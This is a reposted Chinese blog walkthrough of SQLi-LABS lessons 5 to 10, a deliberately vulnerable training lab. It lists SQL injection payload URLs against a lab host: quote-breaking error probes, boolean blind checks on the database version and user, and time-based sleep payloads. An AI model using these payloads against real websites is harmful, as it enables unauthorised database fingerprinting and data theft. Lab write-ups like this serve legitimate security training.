SQLi-LABS Page-1(Basic Challenges) Less5-Less10

Less5

GET - Double Injection - Single Quotes

http://10.10.202.112/sqli/Less-5?id=1

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第1张图片

 

http://10.10.202.112/sqli/Less-5?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://10.10.202.112/sqli/Less-5?id=1"

You are in........... 

猜测SQL语句为:

select login_name,password from table_name where id='$id' limit 0,1

构造payload

http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第2张图片

 

Less-6 

GET - Double Injection - Double Quotes

http://10.10.202.112/sqli/Less-6?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

猜测SQL语句应该为:

select login_name,password from table_name where id="$id" limit 0,1

http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第3张图片

http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第4张图片

 

 

Less-7

GET - Dump into outfile - String

看了源码SQL语句为:

SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1

构造payload

http://10.10.202.112/sqli/Less-7?id=1'))  and sleep(5) -- -

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第5张图片

http://10.10.202.112/sqli/Less-7?id=1'))  and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-7?id=1'))  and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第6张图片

 

Less-8

GET - Blind - Boolian Based - Single Quotes

http://10.10.202.112/sqli/Less-8?id=1' #false

http://10.10.202.112/sqli/Less-8?id=1'--+ #true

猜测SQL:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第7张图片

http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第8张图片

 

Less-9

GET - Blind - Time based. - Single Quotes

源代码SQL

SELECT * FROM users WHERE id='$id' LIMIT 0,1

payload:

http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第9张图片

http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第10张图片

 

Less-10

GET - Blind - Time based - double quotes

http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第11张图片

http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第12张图片

 待续。。。

点击赞赏二维码,您的支持将鼓励我继续创作!

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_第13张图片

转载于:https://www.cnblogs.com/hack404/p/11045748.html

你可能感兴趣的:(SQLi-LABS Page-1(Basic Challenges) Less5-Less10)